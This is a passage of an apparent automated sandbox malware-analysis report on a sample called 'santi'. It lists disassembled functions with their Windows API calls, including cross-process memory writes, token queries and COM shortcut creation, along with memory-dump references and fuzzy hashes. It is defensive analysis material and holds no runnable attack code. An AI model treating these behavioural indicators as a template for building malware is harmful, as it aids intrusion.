                                                                • Opcode Fuzzy Hash: b27e34f6079b932466671dcce25b1315a324dbb948f60960b1d98114068d8018
                                                                • Instruction Fuzzy Hash: 56014C31D05629EBCF02AFE9EC49ADDBB7CFF09721F054455E502B2250DBB09654C7A1
                                                                Function 00319ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CLSIDFromProgID.OLE32 ref: 00319ADC
                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 00319AF7
                                                                • lstrcmpiW.KERNEL32(?,00000000), ref: 00319B05
                                                                • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00319B15
                                                                • CLSIDFromString.OLE32(?,?), ref: 00319B21
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                • String ID:
                                                                • API String ID: 3897988419-0
                                                                • Opcode ID: eaa5abbebe8c6c6f49d2181c5303901bc97092923f432ec51c89cc280aa67d1a
                                                                • Instruction ID: 00113ac77364bc0b7421683ddcf94eb48f403659bf9b3c8f6d47ea9212fa029c
                                                                • Opcode Fuzzy Hash: eaa5abbebe8c6c6f49d2181c5303901bc97092923f432ec51c89cc280aa67d1a
                                                                • Instruction Fuzzy Hash: C1017C76B00205ABDB164F54EC58B9A7BEDEB4C391F14C025F905D6210D7B0DD809BA0
                                                                Function 0031AA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0031AA79
                                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0031AA83
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0031AA92
                                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0031AA99
                                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0031AAAF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: 2fa25437e771f9846a94b278efabf8ad98fe0d72fd14f4c1a44b4814201345a0
                                                                • Instruction ID: fea5778f801d8cede4ab62d0f5c329915936b88097cafba18401ba84ee2eaea6
                                                                • Opcode Fuzzy Hash: 2fa25437e771f9846a94b278efabf8ad98fe0d72fd14f4c1a44b4814201345a0
                                                                • Instruction Fuzzy Hash: CAF0AF313012046FEB121FA5AC88EB73BACFF4E755F004019F901C7190DBA19C41CA61
                                                                Function 0031AAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0031AADA
                                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0031AAE4
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0031AAF3
                                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0031AAFA
                                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0031AB10
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                • String ID:
                                                                • API String ID: 44706859-0
                                                                • Opcode ID: d94c5996681e42ba317fa93e1336a949ce6e35c1437de8c60c21676bca5ca0d9
                                                                • Instruction ID: 41333759ad47afb6fc4d2b32330df8ceaadca741d73cf6dbae834ebee816902c
                                                                • Opcode Fuzzy Hash: d94c5996681e42ba317fa93e1336a949ce6e35c1437de8c60c21676bca5ca0d9
                                                                • Instruction Fuzzy Hash: A1F0C2313052486FEB121FA5FC88EA73BADFF4A755F008029F902C7190CBA19C51CB61
                                                                Function 0031EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0031EC94
                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0031ECAB
                                                                • MessageBeep.USER32(00000000), ref: 0031ECC3
                                                                • KillTimer.USER32(?,0000040A), ref: 0031ECDF
                                                                • EndDialog.USER32(?,00000001), ref: 0031ECF9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                • String ID:
                                                                • API String ID: 3741023627-0
                                                                • Opcode ID: 6bbc66244877c87973854614ea798334fb6c0221cb6aa4cd14ef026cc49d4539
                                                                • Instruction ID: db12d256be4d87b7718be9c5cc751f97346d48b9d077ce372adeda4c16889156
                                                                • Opcode Fuzzy Hash: 6bbc66244877c87973854614ea798334fb6c0221cb6aa4cd14ef026cc49d4539
                                                                • Instruction Fuzzy Hash: CD016230A007159BEB265B10DE4EBD6777CBB14B05F014559EA43654E0DBF1A9948B80
                                                                Function 002FB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EndPath.GDI32(?), ref: 002FB0BA
                                                                • StrokeAndFillPath.GDI32(?,?,0035E680,00000000,?,?,?), ref: 002FB0D6
                                                                • SelectObject.GDI32(?,00000000), ref: 002FB0E9
                                                                • DeleteObject.GDI32 ref: 002FB0FC
                                                                • StrokePath.GDI32(?), ref: 002FB117
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                • String ID:
                                                                • API String ID: 2625713937-0
                                                                • Opcode ID: 558d85ce460767cac95e92481b5052e455871dc2fc9b01b70df1ea74af1a2926
                                                                • Instruction ID: 88492947c9bbba3b01e40dd70d98833ea58e20a7c80f15873b4670f080a386c5
                                                                • Opcode Fuzzy Hash: 558d85ce460767cac95e92481b5052e455871dc2fc9b01b70df1ea74af1a2926
                                                                • Instruction Fuzzy Hash: 41F0C934510649EFDB239F65EC0D7657B6DA7123A2F088325E929850F0CBB18966DF50
                                                                Function 0032F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0032F2DA
                                                                • CoCreateInstance.OLE32(0036DA7C,00000000,00000001,0036D8EC,?), ref: 0032F2F2
                                                                • CoUninitialize.OLE32 ref: 0032F555
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                • String ID: .lnk
                                                                • API String ID: 948891078-24824748
                                                                • Opcode ID: 73fdbce3874383e409f3c87cfe60943abdf3cfebcf1e17158c680cac2251ab14
                                                                • Instruction ID: 850637f1861db9f566bba46030f3fe84a73d80c381a0f966e1a479f7d22ed801
                                                                • Opcode Fuzzy Hash: 73fdbce3874383e409f3c87cfe60943abdf3cfebcf1e17158c680cac2251ab14
                                                                • Instruction Fuzzy Hash: 9AA16D71114201AFD301EFA4C881DAFB7ECEF99704F50492DF25597192DB70EA59CB62
                                                                Function 0032E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E53B1,?,?,002E61FF,?,00000000,00000001,00000000), ref: 002E662F
                                                                • CoInitialize.OLE32(00000000), ref: 0032E85D
                                                                • CoCreateInstance.OLE32(0036DA7C,00000000,00000001,0036D8EC,?), ref: 0032E876
                                                                • CoUninitialize.OLE32 ref: 0032E893
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                • String ID: .lnk
                                                                • API String ID: 2126378814-24824748
                                                                • Opcode ID: 0888c6789fbe49e7213f86477f6abd93281de1447fb296a36f3a0dc5ac000c81
                                                                • Instruction ID: d54b20c84dd6bb436130dd0daa14646a6058e492ac81f20579776e97ed1a4c4b
                                                                • Opcode Fuzzy Hash: 0888c6789fbe49e7213f86477f6abd93281de1447fb296a36f3a0dc5ac000c81
                                                                • Instruction Fuzzy Hash: 5EA174356043119FCB11EF15C885D2ABBE5BF88710F058989F99A9B3A2CB31EC85CF91
                                                                Function 0030325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __startOneArgErrorHandling.LIBCMT ref: 003032ED
                                                                  • Part of subcall function 0030E0D0: __87except.LIBCMT ref: 0030E10B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorHandling__87except__start
                                                                • String ID: pow
                                                                • API String ID: 2905807303-2276729525
                                                                • Opcode ID: ba56d733130abaad92ff5337f15b3ed58d18c2553bdcc6e2fb054d9aa688fce6
                                                                • Instruction ID: 15cff6f3ccee6c5bda7a11b89c0f4e5c410c747c23c9c2c5eed156bb0864f752
                                                                • Opcode Fuzzy Hash: ba56d733130abaad92ff5337f15b3ed58d18c2553bdcc6e2fb054d9aa688fce6
                                                                • Instruction Fuzzy Hash: 4D517835B0B20196CB2B7714C9B237B2BACDB41710F258DA8F4D5862E9DF348ED4DA46
                                                                Function 00324606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0037DC50,?,0000000F,0000000C,00000016,0037DC50,?), ref: 00324645
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003246C5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper$__itow__swprintf
                                                                • String ID: REMOVE$THIS
                                                                • API String ID: 3797816924-776492005
                                                                • Opcode ID: 238a3275619e9f970364caaeefe098cb0049deb024eed69686eec806dcb2a5a3
                                                                • Instruction ID: e94b45240406536b0859d890fc5e15065bb44497295c5805813de905cc8fdb9b
                                                                • Opcode Fuzzy Hash: 238a3275619e9f970364caaeefe098cb0049deb024eed69686eec806dcb2a5a3
                                                                • Instruction Fuzzy Hash: 9841A734A002699FCF02DF99D881AAEB7B5FF49304F148069E926AB252D730DD55CF50
                                                                Function 0031C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 0032430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0031BC08,?,?,00000034,00000800,?,00000034), ref: 00324335
                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0031C1D3
                                                                  • Part of subcall function 003242D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0031BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00324300
                                                                  • Part of subcall function 0032422F: GetWindowThreadProcessId.USER32(?,?), ref: 0032425A
                                                                  • Part of subcall function 0032422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0031BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0032426A
                                                                  • Part of subcall function 0032422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0031BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00324280
                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0031C240
                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0031C28D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                • String ID: @
                                                                • API String ID: 4150878124-2766056989
                                                                • Opcode ID: 6fdf4192fe35b3a6dea19214402627b7968f58d842cf41f1bdf4155eff343987
                                                                • Instruction ID: c20d675277601cf8011a4cf9ec0eceab6317e54f4f071e929494973438269323
                                                                • Opcode Fuzzy Hash: 6fdf4192fe35b3a6dea19214402627b7968f58d842cf41f1bdf4155eff343987
                                                                • Instruction Fuzzy Hash: C5414C7690022CAFDB12DFA4DC81AEEB778AF09700F004495FA45BB181DA716E85CB61
                                                                Function 0034A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0037DC00,00000000,?,?,?,?), ref: 0034A6D8
                                                                • GetWindowLongW.USER32 ref: 0034A6F5
                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0034A705
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Long
                                                                • String ID: SysTreeView32
                                                                • API String ID: 847901565-1698111956
                                                                • Opcode ID: e09be467e39d1fde84ae9df6c1208f30f535be686e58d6dfc925ad69331e89ec
                                                                • Instruction ID: 7df03c5bd20dab968ca98848c0e056a3ee066ab96f5a23b5d47f879bbd031cf4
                                                                • Opcode Fuzzy Hash: e09be467e39d1fde84ae9df6c1208f30f535be686e58d6dfc925ad69331e89ec
                                                                • Instruction Fuzzy Hash: 8131F031240609AFDB228F38CC40BEA7BA9FB49324F264324F975971E0C774AC509B50
                                                                Function 00335180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00335190
                                                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003351C6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CrackInternet_memset
                                                                • String ID: |$D3
                                                                • API String ID: 1413715105-592423575
                                                                • Opcode ID: b087a8a4aa1c8d9d9655e07daa70dee9c628cd87ab05fc28ef3de2d7c3f3bf40
                                                                • Instruction ID: e04b2470d0f920a292d0ee4c2f1d83fa2f1ae16fd42a704a8b1875a2fc852b9e
                                                                • Opcode Fuzzy Hash: b087a8a4aa1c8d9d9655e07daa70dee9c628cd87ab05fc28ef3de2d7c3f3bf40
                                                                • Instruction Fuzzy Hash: 89311871C10119ABCF01AFE5CC85AEE7FB9FF18700F100019F915A6166DA31A956DBA0
                                                                Function 0034A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0034A15E
                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0034A172
                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0034A196
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Window
                                                                • String ID: SysMonthCal32
                                                                • API String ID: 2326795674-1439706946
                                                                • Opcode ID: 8b493181b4ea095c756072955264fe3fcda076cb4999d24c091270626d9b349f
                                                                • Instruction ID: 7b36ee9c51d80ca9a50649f41033ffa0154dace01000256e05164a1bd8c3421d
                                                                • Opcode Fuzzy Hash: 8b493181b4ea095c756072955264fe3fcda076cb4999d24c091270626d9b349f
                                                                • Instruction Fuzzy Hash: DE218D32550218ABDF128F94CC46FEA3BB9EF48754F110214FA55AB1D0D6B5BC518B90
                                                                Function 0034A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0034A941
                                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0034A94F
                                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0034A956
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$DestroyWindow
                                                                • String ID: msctls_updown32
                                                                • API String ID: 4014797782-2298589950
                                                                • Opcode ID: a9b049686c6655f2538ad7e0471809dbea850a3ef3c5c359cb5b3bd93609bbb9
                                                                • Instruction ID: bd1c44d499b0a47263703be0b9282f4921b3319f57b11e58d08f9a59db4565f2
                                                                • Opcode Fuzzy Hash: a9b049686c6655f2538ad7e0471809dbea850a3ef3c5c359cb5b3bd93609bbb9
                                                                • Instruction Fuzzy Hash: 84218EB5640609AFDB12DF18CC91DA737EDEB5A3A4F050059FA049B2A1CB70EC118B61
                                                                Function 003499A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00349A30
                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00349A40
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00349A65
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$MoveWindow
                                                                • String ID: Listbox
                                                                • API String ID: 3315199576-2633736733
                                                                • Opcode ID: ee09968ece93faaa1a3d88ff013a1837e7db5c1a993119386217fda373a21a39
                                                                • Instruction ID: 281c7bba71e89aebec1d61f8ca3cce13e26c3e9547451ecc970e3ff8fc500934
                                                                • Opcode Fuzzy Hash: ee09968ece93faaa1a3d88ff013a1837e7db5c1a993119386217fda373a21a39
                                                                • Instruction Fuzzy Hash: 8D218032610118BFDF228F54CC85FBB3BAEEF89760F028129F9549B1A0C671AC5187A0
